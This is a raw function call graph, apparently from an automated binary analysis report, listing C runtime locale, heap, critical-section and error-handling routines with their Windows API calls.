eb2db9 _LocaleUpdate::_LocaleUpdate 58 API calls 12681->12682 12683 eb441b 12682->12683 12684 eb442a GetOEMCP 12683->12684 12685 eb443c 12683->12685 12687 eb4453 12684->12687 12686 eb4441 GetACP 12685->12686 12685->12687 12686->12687 12687->12672 12687->12675 12687->12677 12692 eb4510 12688->12692 12697 eb45ba 12688->12697 12691 eb1e0d ___strgtold12_l 6 API calls 12694 eb4666 12691->12694 12698 eb9b90 12692->12698 12694->12675 12696 eb9a34 ___crtLCMapStringA 62 API calls 12696->12697 12697->12691 12699 eb2db9 _LocaleUpdate::_LocaleUpdate 58 API calls 12698->12699 12700 eb9ba1 12699->12700 12708 eb9a98 12700->12708 12703 eb9a34 12704 eb2db9 _LocaleUpdate::_LocaleUpdate 58 API calls 12703->12704 12705 eb9a45 12704->12705 12725 eb97eb 12705->12725 12709 eb9abf MultiByteToWideChar 12708->12709 12710 eb9ab2 12708->12710 12711 eb9ae4 12709->12711 12714 eb9aeb 12709->12714 12710->12709 12712 eb1e0d ___strgtold12_l 6 API calls 12711->12712 12713 eb4571 12712->12713 12713->12703 12716 eb6870 _malloc 58 API calls 12714->12716 12719 eb9b0d _memset __crtGetLocaleInfoA_stat 12714->12719 12715 eb9b49 MultiByteToWideChar 12717 eb9b73 12715->12717 12718 eb9b63 GetStringTypeW 12715->12718 12716->12719 12721 eb9a7a 12717->12721 12718->12717 12719->12711 12719->12715 12722 eb9a95 12721->12722 12723 eb9a84 12721->12723 12722->12711 12723->12722 12724 eb2248 _free 58 API calls 12723->12724 12724->12722 12728 eb9804 MultiByteToWideChar 12725->12728 12727 eb9863 12729 eb1e0d ___strgtold12_l 6 API calls 12727->12729 12728->12727 12731 eb986a 12728->12731 12732 eb4592 12729->12732 12730 eb98c9 MultiByteToWideChar 12733 eb9930 12730->12733 12734 eb98e2 12730->12734 12737 eb6870 _malloc 58 API calls 12731->12737 12739 eb9892 __crtGetLocaleInfoA_stat 12731->12739 12732->12696 12736 eb9a7a __freea 58 API calls 12733->12736 12750 eba095 12734->12750 12736->12727 12737->12739 12738 eb98f6 12738->12733 12740 eb990c 12738->12740 12741 eb9938 12738->12741 12739->12727 12739->12730 12740->12733 12742 eba095 ___crtLCMapStringW LCMapStringW 12740->12742 12744 eb6870 _malloc 58 API calls 12741->12744 12748 eb9960 __crtGetLocaleInfoA_stat 12741->12748 12742->12733 12743 eba095 ___crtLCMapStringW LCMapStringW 12745 eb99a3 12743->12745 12744->12748 12746 eb99cb 12745->12746 12749 eb99bd WideCharToMultiByte 12745->12749 12747 eb9a7a __freea 58 API calls 12746->12747 12747->12733 12748->12733 12748->12743 12749->12746 12751 eba0c0 ___crtLCMapStringW 12750->12751 12752 eba0a5 12750->12752 12753 eba0d7 LCMapStringW 12751->12753 12752->12738 12753->12738 12754->12680 14310 ea65e4 14311 eb0e6a 14310->14311 14315 eb0e8c GetFileType 14311->14315 14317 eb19da __getstream InitializeCriticalSectionAndSpinCount 14311->14317 14319 eb0f3c 14311->14319 14312 eb1001 14321 eb1011 14312->14321 14314 eb1009 __commit 14315->14311 14316 eb0f86 GetStdHandle 14316->14319 14317->14311 14318 eb0f99 GetFileType 14318->14319 14319->14312 14319->14316 14319->14318 14320 eb19da __getstream InitializeCriticalSectionAndSpinCount 14319->14320 14320->14319 14324 eb2233 LeaveCriticalSection 14321->14324 14323 eb1018 14323->14314 14324->14323 11496 eb16fb GetEnvironmentStringsW 11497 eb170c 11496->11497 11498 eb1753 11496->11498 11502 eb22c8 11497->11502 11500 eb1732 _memmove 11501 eb1748 FreeEnvironmentStringsW 11500->11501 11501->11498 11503 eb22d6 11502->11503 11505 eb2308 11503->11505 11507 eb22e9 11503->11507 11508 eb6870 11503->11508 11505->11500 11507->11503 11507->11505 11525 eb1d65 Sleep 11507->11525 11509 eb68eb 11508->11509 11512 eb687c 11508->11512 11510 eb4c7e __calloc_impl DecodePointer 11509->11510 11511 eb68f1 11510->11511 11513 eaf100 ___strgtold12_l 57 API calls 11511->11513 11515 eb68af RtlAllocateHeap 11512->11515 11518 eb68d7 11512->11518 11519 eb6887 11512->11519 11523 eb68d5 11512->11523 11568 eb4c7e DecodePointer 11512->11568 11516 eb68e3 11513->11516 11515->11512 11515->11516 11516->11503 11570 eaf100 11518->11570 11519->11512 11526 eb13b8 11519->11526 11535 eb1415 11519->11535 11565 eb08fd 11519->11565 11524 eaf100 ___strgtold12_l 57 API calls 11523->11524 11524->11516 11525->11507 11573 eb15df 11526->11573 11528 eb13bf 11529 eb13cc 11528->11529 11530 eb15df __NMSG_WRITE 58 API calls 11528->11530 11531 eb1415 __NMSG_WRITE 58 API calls 11529->11531 11534 eb13ee 11529->11534 11530->11529 11532 eb13e4 11531->11532 11533 eb1415 __NMSG_WRITE 58 API calls 11532->11533 11533->11534 11534->11519 11536 eb1433 __NMSG_WRITE 11535->11536 11537 eb15df __NMSG_WRITE 55 API calls 11536->11537 11564 eb155a 11536->11564 11539 eb1446 11537->11539 11538 eb1e0d ___strgtold12_l 6 API calls 11540 eb15c3 11538->11540 11541 eb155f GetStdHandle 11539->11541 11542 eb15df __NMSG_WRITE 55 API calls 11539->11542 11540->11519 11545 eb156d _strlen 11541->11545 11541->11564 11543 eb1457 11542->11543 11543->11541 11544 eb1469 11543->11544 11544->11564 11617 eb55ad 11544->11617 11547 eb15a6 WriteFile 11545->11547 11545->11564 11547->11564 11549 eb15c7 11552 eaeb49 __invoke_watson 8 API calls 11549->11552 11550 eb1496 GetModuleFileNameW 11551 eb14b6 11550->11551 11555 eb14c6 __NMSG_WRITE 11550->11555 11554 eb55ad ___crtDownlevelLCIDToLocaleName 55 API calls 11551->11554 11553 eb15d1 11552->11553 11553->11519 11554->11555 11555->11549 11556 eb150c 11555->11556 11626 eb5727 11555->11626 11556->11549 11635 eb56bb 11556->11635 11560 eb56bb __NMSG_WRITE 55 API calls 11561 eb1543 11560->11561 11561->11549 11562 eb154a 11561->11562 11644 eb57e5 EncodePointer 11562->11644 11564->11538 11669 eb08c9 GetModuleHandleExW 11565->11669 11569 eb4c91 11568->11569 11569->11512 11672 eb05ad GetLastError 11570->11672 11572 eaf105 11572->11523 11574 eb15e9 11573->11574 11575 eaf100 ___strgtold12_l 58 API calls 11574->11575 11576 eb15f3 11574->11576 11577 eb160f 11575->11577 11576->11528 11580 eaeb1e 11577->11580 11583 eaeaf3 DecodePointer 11580->11583 11584 eaeb06 11583->11584 11589 eaeb49 IsProcessorFeaturePresent 11584->11589 11587 eaeaf3 ___strgtold12_l 8 API calls 11588 eaeb2a 11587->11588 11588->11528 11590 eaeb54 11589->11590 11595 eae9b4 11590->11595 11594 eaeb1d 11594->11587 11596 eae9ce _memset ___raise_securityfailure 11595->11596 11597 eae9ee IsDebuggerPresent 11596->11597 11603 eb1d88 SetUnhandledExceptionFilter UnhandledExceptionFilter 11597->11603 11600 eaeab2 ___raise_securityfailure 11604 eb1e0d 11600->11604 11601 eaead5 11602 eb1d73 GetCurrentProcess TerminateProcess 11601->11602 11602->11594 11603->11600 11605 eb1e17 IsProcessorFeaturePresent 11604->11605 11606 eb1e15 11604->11606 11608 eb5a3a 11605->11608 11606->11601 11611 eb59e9 IsDebuggerPresent 11608->11611 11612 eb59fe ___raise_securityfailure 11611->11612 11613 eb1d88 ___raise_securityfailure SetUnhandledExceptionFilter UnhandledExceptionFilter 11612->11613 11614 eb5a06 ___raise_securityfailure 11613->11614 11615 eb1d73 __invoke_watson GetCurrentProcess TerminateProcess 11614->11615 11616 eb5a23 11615->11616 11616->11601 11618 eb55c6 11617->11618 11619 eb55b8 11617->11619 11620 eaf100 ___strgtold12_l 58 API calls 11618->11620 11619->11618 11624 eb55df 11619->11624 11621 eb55d0 11620->11621 11622 eaeb1e ___strgtold12_l 9 API calls 11621->11622 11623 eb1489 11622->11623 11623->11549 11623->11550 11624->11623 11625 eaf100 ___strgtold12_l 58 API calls 11624->11625 11625->11621 11630 eb5735 11626->11630 11627 eb5739 11628 eb573e 11627->11628 11629 eaf100 ___strgtold12_l 58 API calls 11627->11629 11628->11556 11631 eb5769 11629->11631 11630->11627 11630->11628 11633 eb5778 11630->11633 11632 eaeb1e ___strgtold12_l 9 API calls 11631->11632 11632->11628 11633->11628 11634 eaf100 ___strgtold12_l 58 API calls 11633->11634 11634->11631 11636 eb56d5 11635->11636 11639 eb56c7 11635->11639 11637 eaf100 ___strgtold12_l 58 API calls 11636->11637 11638 eb56df 11637->11638 11640 eaeb1e ___strgtold12_l 9 API calls 11638->11640 11639->11636 11642 eb5701 11639->11642 11641 eb152c 11640->11641 11641->11549 11641->11560 11642->11641 11643 eaf100 ___strgtold12_l 58 API calls 11642->11643 11643->11638 11645 eb5819 ___crtIsPackagedApp 11644->11645 11646 eb58d8 IsDebuggerPresent 11645->11646 11647 eb5828 LoadLibraryExW 11645->11647 11650 eb58fd 11646->11650 11651 eb58e2 11646->11651 11648 eb583f GetLastError 11647->11648 11649 eb5865 GetProcAddress 11647->11649 11654 eb584e LoadLibraryExW 11648->11654 11660 eb58f5 11648->11660 11655 eb5879 7 API calls 11649->11655 11649->11660 11652 eb58f0 11650->11652 11653 eb5902 DecodePointer 11650->11653 11651->11652 11656 eb58e9 OutputDebugStringW 11651->11656 11657 eb5941 11652->11657 11652->11660 11663 eb5929 DecodePointer DecodePointer 11652->11663 11653->11660 11654->11649 11654->11660 11658 eb58c1 GetProcAddress EncodePointer 11655->11658 11659 eb58d5 11655->11659 11656->11652 11661 eb5979 DecodePointer 11657->11661 11668 eb5965 DecodePointer 11657->11668 11658->11659 11659->11646 11662 eb1e0d ___strgtold12_l 6 API calls 11660->11662 11666 eb5980 11661->11666 11661->11668 11664 eb59c7 11662->11664 11663->11657 11664->11564 11667 eb5991 DecodePointer 11666->11667 11666->11668 11667->11668 11668->11660 11670 eb08f4 ExitProcess 11669->11670 11671 eb08e2 GetProcAddress 11669->11671 11671->11670 11686 eb18d0 11672->11686 11674 eb05c2 11675 eb0610 SetLastError 11674->11675 11689 eb2280 11674->11689 11675->11572 11679 eb05e9 11680 eb05ef 11679->11680 11681 eb0607 11679->11681 11697 eb061c 11680->11697 11707 eb2248 11681->11707 11684 eb05f7 GetCurrentThreadId 11684->11675 11685 eb060d 11685->11675 11687 eb18e3 11686->11687 11688 eb18e7 TlsGetValue 11686->11688 11687->11674 11688->11674 11693 eb2287 11689->11693 11691 eb05d5 11691->11675 11694 eb18ef 11691->11694 11693->11691 11713 eb6a16 11693->11713 11721 eb1d65 Sleep 11693->11721 11695 eb1909 TlsSetValue 11694->11695 11696 eb1905 11694->11696 11695->11679 11696->11679 11698 eb0628 __commit 11697->11698 11722 eb20a9 11698->11722 11700 eb0665 11729 eb06bd 11700->11729 11703 eb20a9 __lock 58 API calls 11704 eb0686 __updatetlocinfoEx_nolock 11703->11704 11732 eb06c6 11704->11732 11706 eb06b1 __commit 11706->11684 11708 eb227a _rand_s 11707->11708 11709 eb2251 HeapFree 11707->11709 11708->11685 11709->11708 11710 eb2266 11709->11710 11711 eaf100 ___strgtold12_l 56 API calls 11710->11711 11712 eb226c GetLastError 11711->11712 11712->11708 11714 eb6a21 11713->11714 11719 eb6a3c 11713->11719 11715 eb6a2d 11714->11715 11714->11719 11716 eaf100 ___strgtold12_l 57 API calls 11715->11716 11718 eb6a32 11716->11718 11717 eb6a4c HeapAlloc 11717->11718 11717->11719 11718->11693 11719->11717 11719->11718 11720 eb4c7e __calloc_impl DecodePointer 11719->11720 11720->11719 11721->11693 11723 eb20ba 11722->11723 11724 eb20cd EnterCriticalSection 11722->11724 11735 eb2151 11723->11735 11724->11700 11726 eb20c0 11726->11724 11759 eb0a20 11726->11759 11802 eb2233 LeaveCriticalSection 11729->11802 11731 eb067f 11731->11703 11803 eb2233 LeaveCriticalSection 11732->11803 11734 eb06cd 11734->11706 11736 eb215d __commit 11735->11736 11737 eb217e 11736->11737 11738 eb2166 11736->11738 11741 eb22c8 __malloc_crt 58 API calls 11737->11741 11752 eb219f __commit 11737->11752 11739 eb13b8 __FF_MSGBANNER 58 API calls 11738->11739 11740 eb216b 11739->11740 11742 eb1415 __NMSG_WRITE 58 API calls 11740->11742 11743 eb2193 11741->11743 11744 eb2172 11742->11744 11745 eb219a 11743->11745 11746 eb21a9 11743->11746 11748 eb08fd _fast_error_exit 3 API calls 11744->11748 11749 eaf100 ___strgtold12_l 58 API calls 11745->11749 11747 eb20a9 __lock 58 API calls 11746->11747 11750 eb21b0 11747->11750 11751 eb217c 11748->11751 11749->11752 11753 eb21bd 11750->11753 11754 eb21d5 11750->11754 11751->11737 11752->11726 11766 eb19da 11753->11766 11756 eb2248 _free 58 API calls 11754->11756 11757 eb21c9 11756->11757 11769 eb21f1 11757->11769 11760 eb13b8 __FF_MSGBANNER 58 API calls 11759->11760 11761 eb0a28 11760->11761 11762 eb1415 __NMSG_WRITE 58 API calls 11761->11762 11763 eb0a30 11762->11763 11773 eb0ade 11763->11773 11767 eb19ea 11766->11767 11768 eb19f7 InitializeCriticalSectionAndSpinCount 11766->11768 11767->11757 11768->11757 11772 eb2233 LeaveCriticalSection 11769->11772 11771 eb21f8 11771->11752 11772->11771 11776 eb0c00 11773->11776 11775 eb0a3b 11777 eb0c0c __commit 11776->11777 11778 eb20a9 __lock 51 API calls 11777->11778 11779 eb0c13 11778->11779 11780 eb0c41 DecodePointer 11779->11780 11783 eb0ccc __initterm 11779->11783 11782 eb0c58 DecodePointer 11780->11782 11780->11783 11789 eb0c68 11782->11789 11796 eb0d1a 11783->11796 11785 eb0d29 __commit 11785->11775 11787 eb0c75 EncodePointer 11787->11789 11788 eb0d11 11790 eb08fd _fast_error_exit 3 API calls 11788->11790 11789->11783 11789->11787 11791 eb0c85 DecodePointer EncodePointer 11789->11791 11792 eb0d1a 11790->11792 11794 eb0c97 DecodePointer DecodePointer 11791->11794 11793 eb0d27 11792->11793 11801 eb2233 LeaveCriticalSection 11792->11801 11793->11775 11794->11789 11797 eb0cfa 11796->11797 11798 eb0d20 11796->11798 11797->11785 11800 eb2233 LeaveCriticalSection 11797->11800 11799 eb2233 _doexit LeaveCriticalSection 11798->11799 11799->11797 11800->11788 11801->11793 11802->11731 11803->11734 13015 ea42ce 13016 eb0d08 13015->13016 13017 eb0d11 13016->13017 13023 eb2233 LeaveCriticalSection 13016->13023 13019 eb08fd _fast_error_exit 3 API calls 13017->13019 13020 eb0d1a 13019->13020 13022 eb0d27 13020->13022 13024 eb2233 LeaveCriticalSection 13020->13024 13023->13017 13024->13022 13438 eb4c49 13439 eb20a9 __lock 58 API calls 13438->13439 13440 eb4c54 DecodePointer EncodePointer 13439->13440 13443 eb2233 LeaveCriticalSection 13440->13443 13442 eb4c78 13443->13442 13552 ea5641 13553 eb7659 13552->13553 13554 eb765e 13553->13554 13555 eb7665 13553->13555 13598 ebea44 13554->13598 13638 ebe1d4 13555->13638 13558 eb7663 13559 eb76c8 13558->13559 13560 eb7671 13558->13560 13687 eba06a 13559->13687 13676 eb7294 13560->13676 13563 eb76ce 13564 eb77d0 __NMSG_WRITE 13563->13564 13566 eb9fdb __crtGetLocaleInfoA_stat GetLocaleInfoW 13563->13566 13570 eb5727 __NMSG_WRITE 58 API calls 13564->13570 13575 eb76bd 13564->13575 13565 eb76b2 13569 eb5727 __NMSG_WRITE 58 API calls 13565->13569 13574 eb7786 _memmove 13565->13574 13565->13575 13567 eb76eb 13566->13567 13571 eb76fc GetACP 13567->13571 13573 eb7708 13567->13573 13568 eb7689 __NMSG_WRITE 13568->13565 13572 eb5727 __NMSG_WRITE 58 API calls 13568->13572 13569->13574 13570->13575 13571->13573 13572->13565 13576 eb5727 __NMSG_WRITE 58 API calls 13573->13576 13574->13575 13577 eb55ad ___crtDownlevelLCIDToLocaleName 58 API calls 13574->13577 13579 eaeb49 __invoke_watson 8 API calls 13575->13579 13578 eb7726 13576->13578 13577->13564 13578->13575 13580 eb5727 __NMSG_WRITE 58 API calls 13578->13580 13584 eb780c __commit 13579->13584 13581 eb773c 13580->13581 13581->13575 13582 eb5727 __NMSG_WRITE 58 API calls 13581->13582 13582->13565 13583 eb78a5 __commit 13584->13583 13585 eb20a9 __lock 58 API calls 13584->13585 13588 eb782b 13585->13588 13586 eb7851 13691 eb78af 13586->13691 13588->13586 13590 eb2248 _free 58 API calls 13588->13590 13590->13586 13591 eb789f 13592 eb2248 _free 58 API calls 13591->13592 13592->13583 13593 eb20a9 __lock 58 API calls 13594 eb786a ___removelocaleref 13593->13594 13596 eb40ee ___freetlocinfo 58 API calls 13594->13596 13597 eb7892 13594->13597 13596->13597 13694 eb78bb 13597->13694 13599 eb0595 ___get_qualified_locale_downlevel 58 API calls 13598->13599 13600 ebea6b _memset 13599->13600 13601 eb0595 ___get_qualified_locale_downlevel 58 API calls 13600->13601 13606 ebea87 13601->13606 13602 ebea94 GetUserDefaultLCID 13609 ebeb32 13602->13609 13604 ebeaca 13605 ebeb3f 13604->13605 13608 ebeadd 13604->13608 13605->13602 13612 ebeb4a 13605->13612 13606->13602 13606->13604 13697 ebe9da 13606->13697 13611 ebeaf3 13608->13611 13615 ebeae8 13608->13615 13632 ebec45 13609->13632 13716 ebe8c3 13609->13716 13706 ebe521 13611->13706 13711 ebe448 13612->13711 13614 eb1e0d ___strgtold12_l 6 API calls 13618 ebec5c 13614->13618 13701 ebe4a4 13615->13701 13618->13558 13620 ebeaf1 13620->13609 13622 ebe9da _TranslateName 60 API calls 13620->13622 13621 ebebad IsValidCodePage 13623 ebebbf IsValidLocale 13621->13623 13621->13632 13624 ebeb15 13622->13624 13625 ebebce 13623->13625 13623->13632 13624->13609 13626 ebeb34 13624->13626 13627 ebeb29 13624->13627 13726 eb9e9b 13625->13726 13628 ebe521 _GetLcidFromLanguage 59 API calls 13626->13628 13630 ebe4a4 _GetLcidFromLangCountry 59 API calls 13627->13630 13628->13609 13630->13609 13632->13614 13633 eb9e9b ___crtDownlevelLCIDToLocaleName 58 API calls 13634 ebec03 GetLocaleInfoW 13633->13634 13634->13632 13635 ebec1d GetLocaleInfoW 13634->13635 13635->13632 13636 ebec34 13635->13636 13733 ebee0f 13636->13733 13639 eb0595 ___get_qualified_locale_downlevel 58 API calls 13638->13639 13640 ebe1e0 13639->13640 13641 ebe219 13640->13641 13763 ebe16a 13640->13763 13643 ebe26c 13641->13643 13645 ebe226 _GetLocaleNameFromLangCountry _GetLocaleNameFromLanguage 13641->13645 13767 ebdc12 13643->13767 13647 ebe16a _TranslateName 60 API calls 13645->13647 13649 ebe24d _GetLocaleNameFromLangCountry _GetLocaleNameFromLanguage 13645->13649 13647->13649 13651 ebe37a 13649->13651 13778 ebe04e 13649->13778 13650 ebe2ae IsValidCodePage 13650->13651 13652 ebe2c0 __NMSG_WRITE 13650->13652 13651->13558 13652->13651 13653 eb5727 __NMSG_WRITE 58 API calls 13652->13653 13654 ebe2f4 13653->13654 13655 ebe38b 13654->13655 13656 ebe2ff 13654->13656 13657 eaeb49 __invoke_watson 8 API calls 13655->13657 13658 eb9fdb __crtGetLocaleInfoA_stat GetLocaleInfoW 13656->13658 13660 ebe397 13657->13660 13659 ebe30d 13658->13659 13659->13651 13662 eb9fdb __crtGetLocaleInfoA_stat GetLocaleInfoW 13659->13662 13661 eb0595 ___get_qualified_locale_downlevel 58 API calls 13660->13661 13663 ebe3b6 13661->13663 13666 ebe32e _wcschr 13662->13666 13664 eb0595 ___get_qualified_locale_downlevel 58 API calls 13663->13664 13665 ebe3bd _LcidFromHexString 13664->13665 13667 ebe3c9 GetLocaleInfoW 13665->13667 13666->13651 13669 eb9fdb __crtGetLocaleInfoA_stat GetLocaleInfoW 13666->13669 13672 ebe362 13666->13672 13668 ebe3ff 13667->13668 13673 ebe3fa _LangCountryEnumProc@4 13667->13673 13670 ebf0c9 _TranslateName 60 API calls 13668->13670 13669->13672 13670->13673 13671 eb1e0d ___strgtold12_l 6 API calls 13674 ebe442 13671->13674 13672->13651 13675 ebee0f __itow_s 58 API calls 13672->13675 13673->13671 13674->13558 13675->13651 13677 eb55ad ___crtDownlevelLCIDToLocaleName 58 API calls 13676->13677 13678 eb72a8 13677->13678 13679 eb72b1 13678->13679 13680 eb72f7 13678->13680 13684 eb72cf 13679->13684 13795 eb7a4a 13679->13795 13681 eaeb49 __invoke_watson 8 API calls 13680->13681 13682 eb7301 13681->13682 13685 eb7a4a __wsetlocale_get_all 91 API calls 13684->13685 13686 eb72f0 13684->13686 13685->13686 13686->13568 13688 eba07a 13687->13688 13689 eba081 ___crtLCMapStringW 13687->13689 13688->13563 13690 eba08b IsValidLocale 13689->13690 13690->13563 14055 eb2233 LeaveCriticalSection 13691->14055 13693 eb785e 13693->13591 13693->13593 14056 eb2233 LeaveCriticalSection 13694->14056 13696 eb78c2 13696->13591 13698 ebe9eb 13697->13698 13699 ebea38 13697->13699 13698->13699 13737 ebf0c9 13698->13737 13699->13604 13702 eb0595 ___get_qualified_locale_downlevel 58 API calls 13701->13702 13703 ebe4ae _GetPrimaryLen __NMSG_WRITE 13702->13703 13704 ebe4f5 EnumSystemLocalesW 13703->13704 13705 ebe50d 13704->13705 13705->13620 13707 eb0595 ___get_qualified_locale_downlevel 58 API calls 13706->13707 13708 ebe52a _GetPrimaryLen __NMSG_WRITE 13707->13708 13709 ebe559 EnumSystemLocalesW 13708->13709 13710 ebe575 13709->13710 13710->13620 13712 eb0595 ___get_qualified_locale_downlevel 58 API calls 13711->13712 13713 ebe451 __NMSG_WRITE 13712->13713 13714 ebe45e EnumSystemLocalesW 13713->13714 13715 ebe483 13714->13715 13715->13609 13717 ebe920 GetLocaleInfoW 13716->13717 13721 ebe8ce __wsetlocale_get_all 13716->13721 13718 ebe93f 13717->13718 13719 ebe911 13717->13719 13718->13719 13720 ebe946 GetACP 13718->13720 13719->13621 13719->13632 13721->13717 13722 ebe8e5 __wsetlocale_get_all 13721->13722 13723 ebe917 13722->13723 13724 ebe8f6 GetLocaleInfoW 13722->13724 13757 ebefc5 13723->13757 13724->13719 13727 eb9efe 13726->13727 13728 eb9ea8 _GetTableIndexFromLcid _wcsnlen 13726->13728 13727->13632 13727->13633 13728->13727 13729 eb55ad ___crtDownlevelLCIDToLocaleName 58 API calls 13728->13729 13730 eb9ef7 13729->13730 13730->13727 13731 eaeb49 __invoke_watson 8 API calls 13730->13731 13732 eb9f16 13731->13732 13734 ebee1b 13733->13734 13735 ebee95 _xtow_s@20 58 API calls 13734->13735 13736 ebee36 13735->13736 13736->13632 13738 ebf14a 13737->13738 13739 ebf0d5 13737->13739 13747 ebf15c 13738->13747 13742 eaf100 ___strgtold12_l 58 API calls 13739->13742 13746 ebf0fa 13739->13746 13743 ebf0e1 13742->13743 13744 eaeb1e ___strgtold12_l 9 API calls 13743->13744 13745 ebf0ec 13744->13745 13745->13698 13746->13698 13748 eb2db9 _LocaleUpdate::_LocaleUpdate 58 API calls 13747->13748 13749 ebf16f 13748->13749 13750 ebf17d 13749->13750 13751 ebf197 13749->13751 13752 eaf100 ___strgtold12_l 58 API calls 13750->13752 13755 eb70fa 60 API calls __towlower_l 13751->13755 13756 ebf157 13751->13756 13753 ebf182 13752->13753 13754 eaeb1e ___strgtold12_l 9 API calls 13753->13754 13754->13756 13755->13751 13756->13698 13760 ebf4e6 13757->13760 13761 ebf2d5 wcstoxl 59 API calls 13760->13761 13762 ebefd4 13761->13762 13762->13719 13764 ebe17b 13763->13764 13765 ebe1c8 13763->13765 13764->13765 13766 ebf0c9 _TranslateName 60 API calls 13764->13766 13765->13641 13766->13764 13790 eba03f 13767->13790 13769 ebdc6f 13771 eb1e0d ___strgtold12_l 6 API calls 13769->13771 13770 ebdc3e __NMSG_WRITE 13770->13769 13773 eb5727 __NMSG_WRITE 58 API calls 13770->13773 13772 ebdc7a 13771->13772 13772->13649 13774 ebdc68 13773->13774 13774->13769 13775 ebdc7e 13774->13775 13776 eaeb49 __invoke_watson 8 API calls 13775->13776 13777 ebdc8a 13776->13777 13779 ebe059 __wsetlocale_get_all 13778->13779 13780 ebe0b0 13778->13780 13779->13780 13784 ebe070 __wsetlocale_get_all 13779->13784 13781 eb9fdb __crtGetLocaleInfoA_stat GetLocaleInfoW 13780->13781 13782 ebe0c9 13781->13782 13783 ebe0db GetACP 13782->13783 13789 ebe09a 13782->13789 13785 ebe081 13784->13785 13786 ebe0a7 13784->13786 13787 eb9fdb __crtGetLocaleInfoA_stat GetLocaleInfoW 13785->13787 13788 ebefc5 ___get_qualified_locale_downlevel 59 API calls 13786->13788 13787->13789 13788->13789 13789->13650 13789->13651 13791 eba059 GetUserDefaultLCID 13790->13791 13792 eba055 13790->13792 13793 eb9e9b ___crtDownlevelLCIDToLocaleName 58 API calls 13791->13793 13792->13770 13794 eba065 13793->13794 13794->13770 13796 eb7a79 13795->13796 13798 eb7a58 13795->13798 13796->13684 13797 eb56bb __NMSG_WRITE 58 API calls 13797->13798 13798->13796 13798->13797 13799 eb7a7e 13798->13799 13800 eaeb49 __invoke_watson 8 API calls 13799->13800 13801 eb7a88 __commit 13800->13801 13802 eb7aa0 13801->13802 13803 eb7ab7 13801->13803 13804 eaf100 ___strgtold12_l 58 API calls 13802->13804 13805 eb0595 ___get_qualified_locale_downlevel 58 API calls 13803->13805 13806 eb7aa5 13804->13806 13807 eb7abc 13805->13807 13808 eaeb1e ___strgtold12_l 9 API calls 13806->13808 13809 eb42e8 _LocaleUpdate::_LocaleUpdate 58 API calls 13807->13809 13813 eb7ab0 __commit __wsetlocale_get_all 13808->13813 13810 eb7ac6 13809->13810 13811 eb2280 __calloc_crt 58 API calls 13810->13811 13812 eb7ad9 13811->13812 13812->13813 13814 eb20a9 __lock 58 API calls 13812->13814 13813->13684 13815 eb7aef __copytlocinfo_nolock 13814->13815 13830 eb7bbf 13815->13830 13820 eb7bd9 ___removelocaleref 13823 eb40ee ___freetlocinfo 58 API calls 13820->13823 13821 eb7b27 __wsetlocale_get_all 13822 eb20a9 __lock 58 API calls 13821->13822 13824 eb7b51 13822->13824 13823->13813 13825 eb4368 __updatetlocinfoEx_nolock 58 API calls 13824->13825 13827 eb7b63 ___removelocaleref 13825->13827 13826 eb7b88 13854 eb7bce 13826->13854 13827->13826 13829 eb4368 __updatetlocinfoEx_nolock 58 API calls 13827->13829 13829->13826 13857 eb2233 LeaveCriticalSection 13830->13857 13832 eb7b0b 13833 eb7d73 13832->13833 13834 eb7d9c 13833->13834 13841 eb7dbb 13833->13841 13835 eb7da8 13834->13835 13858 eb7ffc 13834->13858 13840 eb1e0d ___strgtold12_l 6 API calls 13835->13840 13836 eb7f2b 13836->13835 13945 eb7c06 13836->13945 13838 eb7f3f 13887 eb7516 13838->13887 13843 eb7b17 13840->13843 13841->13836 13841->13838 13847 eb7df7 _wcscspn _wcspbrk __wopenfile __NMSG_WRITE 13841->13847 13843->13820 13843->13821 13844 eb7f5b __wsetlocale_get_all 13844->13835 13844->13836 13845 eb7ffc __wsetlocale_set_cat 91 API calls 13844->13845 13845->13844 13846 eb5727 __NMSG_WRITE 58 API calls 13846->13847 13847->13835 13847->13836 13847->13846 13848 eb7fef 13847->13848 13850 eb7fea 13847->13850 13852 eb7ffc __wsetlocale_set_cat 91 API calls 13847->13852 13849 eaeb49 __invoke_watson 8 API calls 13848->13849 13851 eb7ffb 13849->13851 13987 eb5b21 13850->13987 13852->13847 14054 eb2233 LeaveCriticalSection 13854->14054 13856 eb7bd5 13856->13813 13857->13832 13859 eb0595 ___get_qualified_locale_downlevel 58 API calls 13858->13859 13860 eb8026 13859->13860 13861 eb7516 __expandlocale 91 API calls 13860->13861 13865 eb8053 __wsetlocale_get_all __NMSG_WRITE 13861->13865 13862 eb805a 13863 eb1e0d ___strgtold12_l 6 API calls 13862->13863 13864 eb8069 13863->13864 13864->13835 13865->13862 13866 eb22c8 __malloc_crt 58 API calls 13865->13866 13867 eb80ae 13866->13867 13867->13862 13868 eb55ad ___crtDownlevelLCIDToLocaleName 58 API calls 13867->13868 13869 eb80f7 13868->13869 13870 eb8372 13869->13870 13874 eb8121 13869->13874 13990 eb721d 13869->13990 13871 eaeb49 __invoke_watson 8 API calls 13870->13871 13872 eb83a5 13871->13872 13872->13835 13877 eb9b90 ___crtGetStringTypeA 61 API calls 13874->13877 13884 eb821c _memcmp 13874->13884 13875 eb82fb 13878 eb2248 _free 58 API calls 13875->13878 13876 eb833a 13876->13870 13880 eb2248 _free 58 API calls 13876->13880 13877->13884 13879 eb8311 13878->13879 13881 eb2248 _free 58 API calls 13879->13881 13882 eb8357 13880->13882 13881->13862 13883 eb2248 _free 58 API calls 13882->13883 13885 eb8360 13883->13885 13884->13875 13884->13876 13886 eb2248 _free 58 API calls 13885->13886 13886->13870 13888 eb0595 ___get_qualified_locale_downlevel 58 API calls 13887->13888 13889 eb7549 13888->13889 13890 eb7579 13889->13890 13891 eb5727 __NMSG_WRITE 58 API calls 13889->13891 13892 eb1e0d ___strgtold12_l 6 API calls 13890->13892 13893 eb75a3 13891->13893 13894 eb7588 13892->13894 13895 eb75ba 13893->13895 13900 eb75e3 __wsetlocale_get_all __NMSG_WRITE 13893->13900 13942 eb76bd 13893->13942 13894->13844 13897 eb55ad ___crtDownlevelLCIDToLocaleName 58 API calls 13895->13897 13896 eaeb49 __invoke_watson 8 API calls 13903 eb780c __commit 13896->13903 13898 eb75ce 13897->13898 13898->13890 13898->13942 13904 eb7786 _memmove 13900->13904 14034 eb7302 13900->14034 13901 eb7645 13905 eb76c2 13901->13905 13909 eb765e 13901->13909 13910 eb7665 13901->13910 13902 eb78a5 __commit 13902->13844 13903->13902 13906 eb20a9 __lock 58 API calls 13903->13906 13908 eb55ad ___crtDownlevelLCIDToLocaleName 58 API calls 13904->13908 13904->13942 13911 eba06a __expandlocale IsValidLocale 